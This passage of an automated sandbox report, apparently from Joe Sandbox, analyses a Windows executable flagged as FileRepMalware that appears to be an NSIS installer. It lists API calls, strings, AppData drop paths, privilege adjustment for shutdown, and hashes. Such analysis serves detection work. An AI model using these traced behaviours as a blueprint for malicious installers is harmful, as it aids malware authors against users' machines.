3998 4032f5 SetFilePointer 3895->3998 3896->3893 3997 4032f5 SetFilePointer 3897->3997 3902 402e5d 6 API calls 3898->3902 3901 403088 3904 4030fa 35 API calls 3901->3904 3902->3886 3903 403056 3905 4032df ReadFile 3903->3905 3909 403094 3904->3909 3907 403061 3905->3907 3906->3893 3907->3886 3907->3897 3986 402e5d 3908->3986 3909->3886 3909->3909 3910 4030d1 SetFilePointer 3909->3910 3910->3886 3912 406626 5 API calls 3911->3912 3913 40396e 3912->3913 3914 403974 3913->3914 3915 403986 3913->3915 4007 406193 wsprintfW 3914->4007 3916 40611a 3 API calls 3915->3916 3917 4039b6 3916->3917 3919 4039d5 lstrcatW 3917->3919 3921 40611a 3 API calls 3917->3921 3920 403984 3919->3920 3999 403c30 3920->3999 3921->3919 
3924 405c25 18 API calls 3927 403a07 3924->3927 3925 403a9b 3926 405c25 18 API calls 3925->3926 3928 403aa1 3926->3928 3927->3925 3929 40611a 3 API calls 3927->3929 3931 403ab1 LoadImageW 3928->3931 3932 40626e 17 API calls 3928->3932 3930 403a39 3929->3930 3930->3925 3935 403a5a lstrlenW 3930->3935 3938 405b4a CharNextW 3930->3938 3933 403b57 3931->3933 3934 403ad8 RegisterClassW 3931->3934 3932->3931 3937 40140b 2 API calls 3933->3937 3936 403b0e SystemParametersInfoW CreateWindowExW 3934->3936 3966 403b61 3934->3966 3939 403a68 lstrcmpiW 3935->3939 3940 403a8e 3935->3940 3936->3933 3941 403b5d 3937->3941 3942 403a57 3938->3942 3939->3940 3943 403a78 GetFileAttributesW 3939->3943 3944 405b1d 3 API calls 3940->3944 3946 403c30 18 API calls 3941->3946 3941->3966 3942->3935 3945 403a84 3943->3945 3947 403a94 3944->3947 3945->3940 3948 405b69 2 API calls 3945->3948 3949 403b6e 3946->3949 4008 40624c lstrcpynW 3947->4008 3948->3940 3951 403b7a ShowWindow 3949->3951 3952 403bfd 3949->3952 3954 4065b6 3 API calls 3951->3954 3953 405383 5 API calls 3952->3953 3956 403c03 3953->3956 3955 403b92 3954->3955 3957 403ba0 GetClassInfoW 3955->3957 3960 4065b6 3 API calls 3955->3960 3958 403c07 3956->3958 3959 403c1f 3956->3959 3962 403bb4 GetClassInfoW RegisterClassW 3957->3962 3963 403bca DialogBoxParamW 3957->3963 3965 40140b 2 API calls 3958->3965 3958->3966 3961 40140b 2 API calls 3959->3961 3960->3957 3961->3966 3962->3963 3964 40140b 2 API calls 3963->3964 3964->3966 3965->3966 3966->3866 3967->3816 3968->3847 3969->3855 3971 403898 3970->3971 3972 40388a CloseHandle 3970->3972 4010 4038c5 3971->4010 3972->3971 3975 40595a 67 API calls 3976 4036b3 OleUninitialize 3975->3976 3976->3823 3976->3824 3977->3856 3978->3868 3980 405d7a GetTickCount GetTempFileNameW 3979->3980 3981 405db0 3980->3981 3982 40333b 3980->3982 3981->3980 3981->3982 3982->3803 3983->3885 3984->3888 3985->3892 3987 402e66 3986->3987 3988 402e7e 3986->3988 3989 402e76 3987->3989 3990 402e6f DestroyWindow 
3987->3990 3991 402e86 3988->3991 3992 402e8e GetTickCount 3988->3992 3989->3895 3990->3989 3993 406662 2 API calls 3991->3993 3994 402e9c CreateDialogParamW ShowWindow 3992->3994 3995 402ebf 3992->3995 3996 402e8c 3993->3996 3994->3995 3995->3895 3996->3895 3997->3901 3998->3903 4000 403c44 3999->4000 4009 406193 wsprintfW 4000->4009 4002 403cb5 4003 403ce9 18 API calls 4002->4003 4005 403cba 4003->4005 4004 4039e5 4004->3924 4005->4004 4006 40626e 17 API calls 4005->4006 4006->4005 4007->3920 4008->3925 4009->4002 4012 4038d3 4010->4012 4011 40389d 4011->3975 4012->4011 4013 4038d8 FreeLibrary GlobalFree 4012->4013 4013->4011 4013->4013

                                                                            Control-flow Graph

                                                                            control_flow_graph: basic blocks and edges of the function at 0040333D (entry block calls SetErrorMode, GetVersion); graph data not reproduced
                                                                            APIs
                                                                            • SetErrorMode.KERNELBASE ref: 00403360
                                                                            • GetVersion.KERNEL32 ref: 00403366
                                                                            • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 00403399
                                                                            • #17.COMCTL32(?,00000006,00000008,0000000A), ref: 004033D6
                                                                            • OleInitialize.OLE32(00000000), ref: 004033DD
                                                                            • SHGetFileInfoW.SHELL32(004216A8,00000000,?,000002B4,00000000), ref: 004033F9
                                                                            • GetCommandLineW.KERNEL32(00429200,NSIS Error,?,00000006,00000008,0000000A), ref: 0040340E
                                                                            • GetModuleHandleW.KERNEL32(00000000,"C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.12793.28433.exe",00000000,?,00000006,00000008,0000000A), ref: 00403421
                                                                            • CharNextW.USER32(00000000,"C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.12793.28433.exe",00000020,?,00000006,00000008,0000000A), ref: 00403448
                                                                              • Part of subcall function 00406626: GetModuleHandleA.KERNEL32(?,00000020,?,004033AF,0000000A), ref: 00406638
                                                                              • Part of subcall function 00406626: GetProcAddress.KERNEL32(00000000,?), ref: 00406653
                                                                            • GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,?,00000006,00000008,0000000A), ref: 00403582
                                                                            • GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB,?,00000006,00000008,0000000A), ref: 00403593
                                                                            • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp,?,00000006,00000008,0000000A), ref: 0040359F
                                                                            • GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp,?,00000006,00000008,0000000A), ref: 004035B3
                                                                            • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low,?,00000006,00000008,0000000A), ref: 004035BB
                                                                            • SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low,?,00000006,00000008,0000000A), ref: 004035CC
                                                                            • SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\,?,00000006,00000008,0000000A), ref: 004035D4
                                                                            • DeleteFileW.KERNELBASE(1033,?,00000006,00000008,0000000A), ref: 004035E8
                                                                              • Part of subcall function 0040624C: lstrcpynW.KERNEL32(?,?,00000400,0040340E,00429200,NSIS Error,?,00000006,00000008,0000000A), ref: 00406259
                                                                            • OleUninitialize.OLE32(00000006,?,00000006,00000008,0000000A), ref: 004036B3
                                                                            • ExitProcess.KERNEL32 ref: 004036D4
                                                                            • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.12793.28433.exe",00000000,00000006,?,00000006,00000008,0000000A), ref: 004036E7
                                                                            • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,0040A26C,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.12793.28433.exe",00000000,00000006,?,00000006,00000008,0000000A), ref: 004036F6
                                                                            • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.12793.28433.exe",00000000,00000006,?,00000006,00000008,0000000A), ref: 00403701
                                                                            • lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.12793.28433.exe",00000000,00000006,?,00000006,00000008,0000000A), ref: 0040370D
                                                                            • SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,?,00000006,00000008,0000000A), ref: 00403729
                                                                            • DeleteFileW.KERNEL32(00420EA8,00420EA8,?,0042B000,00000008,?,00000006,00000008,0000000A), ref: 00403783
                                                                            • CopyFileW.KERNEL32(00438800,00420EA8,00000001,?,00000006,00000008,0000000A), ref: 00403797
                                                                            • CloseHandle.KERNEL32(00000000,00420EA8,00420EA8,?,00420EA8,00000000,?,00000006,00000008,0000000A), ref: 004037C4
                                                                            • GetCurrentProcess.KERNEL32(00000028,0000000A,00000006,00000008,0000000A), ref: 004037F3
                                                                            • OpenProcessToken.ADVAPI32(00000000), ref: 004037FA
                                                                            • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 0040380F
                                                                            • AdjustTokenPrivileges.ADVAPI32 ref: 00403832
                                                                            • ExitWindowsEx.USER32(00000002,80040002), ref: 00403857
                                                                            • ExitProcess.KERNEL32 ref: 0040387A
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1308833301.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.1308804129.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.1308856043.0000000000408000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.1308879767.000000000040A000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.1308879767.0000000000422000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.1308879767.0000000000427000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.1308879767.000000000042C000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.1308879767.000000000042F000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.1308879767.0000000000435000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.1308879767.000000000045E000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.1309502773.0000000000462000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: lstrcat$FileProcess$ExitHandle$CurrentDeleteDirectoryEnvironmentModulePathTempTokenVariableWindows$AddressAdjustCharCloseCommandCopyErrorInfoInitializeLineLookupModeNextOpenPrivilegePrivilegesProcUninitializeValueVersionlstrcmpilstrcpynlstrlen
                                                                            • String ID: "C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.12793.28433.exe"$.tmp$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\euthanasic\satineredes\Gammastraales$C:\Users\user\AppData\Roaming\euthanasic\satineredes\Gammastraales\Ekspertenhed\plyndrer$C:\Users\user\Desktop$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
                                                                            • API String ID: 2488574733-1648080515
                                                                            • Opcode ID: e7c14eb664e5024c42dfa4d2f8ce4aee3ce13a771c1e87f2ab963189daa35b61
                                                                            • Instruction ID: 8796dd7fda2277e74c31c2c32d36de8c434ed5469641edba7c3d6f01ab9f589a
                                                                            • Opcode Fuzzy Hash: e7c14eb664e5024c42dfa4d2f8ce4aee3ce13a771c1e87f2ab963189daa35b61
                                                                            • Instruction Fuzzy Hash: 8AD11470600310ABD7207F759D45B2B3AACEB4074AF10447EF881B62D1DB7E8956CB6E

                                                                            Control-flow Graph

                                                                            control_flow_graph: basic blocks and edges of the function at 004053EF (dialog handler calling GetDlgItem, SendMessageW, CreateThread, clipboard APIs); graph data not reproduced
                                                                            APIs
                                                                            • GetDlgItem.USER32(?,00000403), ref: 0040544D
                                                                            • GetDlgItem.USER32(?,000003EE), ref: 0040545C
                                                                            • GetClientRect.USER32(?,?), ref: 00405499
                                                                            • GetSystemMetrics.USER32(00000002), ref: 004054A0
                                                                            • SendMessageW.USER32(?,00001061,00000000,?), ref: 004054C1
                                                                            • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004054D2
                                                                            • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 004054E5
                                                                            • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 004054F3
                                                                            • SendMessageW.USER32(?,00001024,00000000,?), ref: 00405506
                                                                            • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00405528
                                                                            • ShowWindow.USER32(?,00000008), ref: 0040553C
                                                                            • GetDlgItem.USER32(?,000003EC), ref: 0040555D
                                                                            • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 0040556D
                                                                            • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 00405586
                                                                            • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 00405592
                                                                            • GetDlgItem.USER32(?,000003F8), ref: 0040546B
                                                                              • Part of subcall function 00404216: SendMessageW.USER32(00000028,?,00000001,00404041), ref: 00404224
                                                                            • GetDlgItem.USER32(?,000003EC), ref: 004055AF
                                                                            • CreateThread.KERNELBASE(00000000,00000000,Function_00005383,00000000), ref: 004055BD
                                                                            • CloseHandle.KERNELBASE(00000000), ref: 004055C4
                                                                            • ShowWindow.USER32(00000000), ref: 004055E8
                                                                            • ShowWindow.USER32(?,00000008), ref: 004055ED
                                                                            • ShowWindow.USER32(00000008), ref: 00405637
                                                                            • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040566B
                                                                            • CreatePopupMenu.USER32 ref: 0040567C
                                                                            • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 00405690
                                                                            • GetWindowRect.USER32(?,?), ref: 004056B0
                                                                            • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004056C9
                                                                            • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405701
                                                                            • OpenClipboard.USER32(00000000), ref: 00405711
                                                                            • EmptyClipboard.USER32 ref: 00405717
                                                                            • GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405723
                                                                            • GlobalLock.KERNEL32(00000000), ref: 0040572D
                                                                            • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405741
                                                                            • GlobalUnlock.KERNEL32(00000000), ref: 00405761
                                                                            • SetClipboardData.USER32(0000000D,00000000), ref: 0040576C
                                                                            • CloseClipboard.USER32 ref: 00405772
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1308833301.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.1308804129.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.1308856043.0000000000408000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.1308879767.000000000040A000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.1308879767.0000000000422000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.1308879767.0000000000427000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.1308879767.000000000042C000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.1308879767.000000000042F000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.1308879767.0000000000435000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.1308879767.000000000045E000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.1309502773.0000000000462000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                                            • String ID: {$6B
                                                                            • API String ID: 590372296-3705917127
                                                                            • Opcode ID: bafaae828d30907193abfb7d0b2ebba1375cd8af34f5706ff9aabcfc974c4f7c
                                                                            • Instruction ID: d3ec127817543c8dcb48433ae4040966c093085d210dffb8a3526856162b3191
                                                                            • Opcode Fuzzy Hash: bafaae828d30907193abfb7d0b2ebba1375cd8af34f5706ff9aabcfc974c4f7c
                                                                            • Instruction Fuzzy Hash: B1B14A70900609FFDB119FA1DD89AAE7B79FB44354F00403AFA45B61A0CB754E52DF68

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 499 40595a-405980 call 405c25 502 405982-405994 DeleteFileW 499->502 503 405999-4059a0 499->503 504 405b16-405b1a 502->504 505 4059a2-4059a4 503->505 506 4059b3-4059c3 call 40624c 503->506 507 405ac4-405ac9 505->507 508 4059aa-4059ad 505->508 514 4059d2-4059d3 call 405b69 506->514 515 4059c5-4059d0 lstrcatW 506->515 507->504 510 405acb-405ace 507->510 508->506 508->507 512 405ad0-405ad6 510->512 513 405ad8-405ae0 call 40658f 510->513 512->504 513->504 523 405ae2-405af6 call 405b1d call 405912 513->523 516 4059d8-4059dc 514->516 515->516 519 4059e8-4059ee lstrcatW 516->519 520 4059de-4059e6 516->520 522 4059f3-405a0f lstrlenW FindFirstFileW 519->522 520->519 520->522 524 405a15-405a1d 522->524 525 405ab9-405abd 522->525 539 405af8-405afb 523->539 540 405b0e-405b11 call 4052b0 523->540 528 405a3d-405a51 call 40624c 524->528 529 405a1f-405a27 524->529 525->507 527 405abf 525->527 527->507 541 405a53-405a5b 528->541 542 405a68-405a73 call 405912 528->542 531 405a29-405a31 529->531 532 405a9c-405aac FindNextFileW 529->532 531->528 535 405a33-405a3b 531->535 532->524 538 405ab2-405ab3 FindClose 532->538 535->528 535->532 538->525 539->512 545 405afd-405b0c call 4052b0 call 406012 539->545 540->504 541->532 546 405a5d-405a66 call 40595a 541->546 551 405a94-405a97 call 4052b0 542->551 552 405a75-405a78 542->552 545->504 546->532 551->532 555 405a7a-405a8a call 4052b0 call 406012 552->555 556 405a8c-405a92 552->556 555->532 556->532
                                                                            APIs
                                                                            • DeleteFileW.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\,774D3420,00000000), ref: 00405983
                                                                            • lstrcatW.KERNEL32(004256F0,\*.*,004256F0,?,?,C:\Users\user\AppData\Local\Temp\,774D3420,00000000), ref: 004059CB
                                                                            • lstrcatW.KERNEL32(?,0040A014,?,004256F0,?,?,C:\Users\user\AppData\Local\Temp\,774D3420,00000000), ref: 004059EE
                                                                            • lstrlenW.KERNEL32(?,?,0040A014,?,004256F0,?,?,C:\Users\user\AppData\Local\Temp\,774D3420,00000000), ref: 004059F4
                                                                            • FindFirstFileW.KERNELBASE(004256F0,?,?,?,0040A014,?,004256F0,?,?,C:\Users\user\AppData\Local\Temp\,774D3420,00000000), ref: 00405A04
                                                                            • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405AA4
                                                                            • FindClose.KERNEL32(00000000), ref: 00405AB3
                                                                            Strings
                                                                            • "C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.12793.28433.exe", xrefs: 0040595A
                                                                            • \*.*, xrefs: 004059C5
                                                                            • C:\Users\user\AppData\Local\Temp\, xrefs: 00405968
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1308833301.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.1308804129.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.1308856043.0000000000408000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.1308879767.000000000040A000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.1308879767.0000000000422000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.1308879767.0000000000427000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.1308879767.000000000042C000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.1308879767.000000000042F000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.1308879767.0000000000435000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.1308879767.000000000045E000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.1309502773.0000000000462000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                            • String ID: "C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.12793.28433.exe"$C:\Users\user\AppData\Local\Temp\$\*.*
                                                                            • API String ID: 2035342205-2575430948
                                                                            • Opcode ID: cef271d36a4cb6b758dae5d81120ae6a1160f274867ba4d7352c158524ee07bb
                                                                            • Instruction ID: a8a76f5088e9b8e84a0c744efebc89a786f36fdc765849bba2b15b9d7042df22
                                                                            • Opcode Fuzzy Hash: cef271d36a4cb6b758dae5d81120ae6a1160f274867ba4d7352c158524ee07bb
                                                                            • Instruction Fuzzy Hash: BA41E230A01A14AACB21BB658C89ABF7778EF81764F50427FF801711D1D77C5982DEAE
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1308833301.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.1308804129.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.1308856043.0000000000408000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.1308879767.000000000040A000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.1308879767.0000000000422000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.1308879767.0000000000427000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.1308879767.000000000042C000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.1308879767.000000000042F000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.1308879767.0000000000435000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.1308879767.000000000045E000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.1309502773.0000000000462000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 243907c00f3d7d55c33cca0d1e8b50e30fc2ef132c4317966eea85650a7ed6a7
                                                                            • Instruction ID: dcd014b85e7262d3741248fa227238ad6671e2837142342cd84456719761ddbf
                                                                            • Opcode Fuzzy Hash: 243907c00f3d7d55c33cca0d1e8b50e30fc2ef132c4317966eea85650a7ed6a7
                                                                            • Instruction Fuzzy Hash: 7FF17871D04229CBCF18CFA8C8946ADBBB0FF44305F25856ED856BB281D7386A86CF45
                                                                            APIs
                                                                            • FindFirstFileW.KERNELBASE(?,00426738,00425EF0,00405C6E,00425EF0,00425EF0,00000000,00425EF0,00425EF0,?,?,774D3420,0040597A,?,C:\Users\user\AppData\Local\Temp\,774D3420), ref: 0040659A
                                                                            • FindClose.KERNEL32(00000000), ref: 004065A6
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1308833301.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.1308804129.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.1308856043.0000000000408000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.1308879767.000000000040A000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.1308879767.0000000000422000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.1308879767.0000000000427000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.1308879767.000000000042C000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.1308879767.000000000042F000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.1308879767.0000000000435000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.1308879767.000000000045E000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.1309502773.0000000000462000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: Find$CloseFileFirst
                                                                            • String ID: 8gB
                                                                            • API String ID: 2295610775-1733800166
                                                                            • Opcode ID: 10d21b2891892a60ec94b320bc5d87934ec883ac9a5b90ef038b3d3a92de116a
                                                                            • Instruction ID: 94cc43f68e1cdd1d7b1eae1ec77a84073341a0d38183f0b632eac2f66d480838
                                                                            • Opcode Fuzzy Hash: 10d21b2891892a60ec94b320bc5d87934ec883ac9a5b90ef038b3d3a92de116a
                                                                            • Instruction Fuzzy Hash: 5DD01231509020ABC20157387D0C85BBA5C9F55331B129A37B466F52E4D7348C6286AC
                                                                            APIs
                                                                            • CoCreateInstance.OLE32(004084DC,?,00000001,004084CC,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 0040217D
                                                                            Strings
                                                                            • C:\Users\user\AppData\Roaming\euthanasic\satineredes\Gammastraales\Ekspertenhed\plyndrer, xrefs: 004021BD
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1308833301.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.1308804129.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.1308856043.0000000000408000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.1308879767.000000000040A000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.1308879767.0000000000422000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.1308879767.0000000000427000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.1308879767.000000000042C000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.1308879767.000000000042F000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.1308879767.0000000000435000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.1308879767.000000000045E000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.1309502773.0000000000462000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: CreateInstance
                                                                            • String ID: C:\Users\user\AppData\Roaming\euthanasic\satineredes\Gammastraales\Ekspertenhed\plyndrer
                                                                            • API String ID: 542301482-1185868749
                                                                            • Opcode ID: f9d162837d69daf770c0eabca54ae53132f7e60540a71a71b4ad6ecbd4f442c0
                                                                            • Instruction ID: 8d58e3acc7b173ba9b06918936dfe92dd1a067fa61399e551ad1d720d45e9931
                                                                            • Opcode Fuzzy Hash: f9d162837d69daf770c0eabca54ae53132f7e60540a71a71b4ad6ecbd4f442c0
                                                                            • Instruction Fuzzy Hash: A64148B5A00208AFCB10DFE4C988AAEBBB5FF48314F20457AF515EB2D1DB799941CB44
                                                                            APIs
                                                                            • FindFirstFileW.KERNELBASE(00000000,?,00000002), ref: 00402871
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1308833301.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.1308804129.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.1308856043.0000000000408000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.1308879767.000000000040A000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.1308879767.0000000000422000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.1308879767.0000000000427000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.1308879767.000000000042C000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.1308879767.000000000042F000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.1308879767.0000000000435000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.1308879767.000000000045E000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.1309502773.0000000000462000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: FileFindFirst
                                                                            • String ID:
                                                                            • API String ID: 1974802433-0
                                                                            • Opcode ID: d94b6344d4f0efc598b909131905a4996fdae2a99134213a4831ed8039556d1b
                                                                            • Instruction ID: 457e94eee93b26a2a7a920d72ffedce9eee0ef57ab85e6e0c0e07cda1b0ec514
                                                                            • Opcode Fuzzy Hash: d94b6344d4f0efc598b909131905a4996fdae2a99134213a4831ed8039556d1b
                                                                            • Instruction Fuzzy Hash: 72F08271A04104EFD710EBA4DD49AADB378EF00314F2045BBF911F21D1D7B44E409B2A

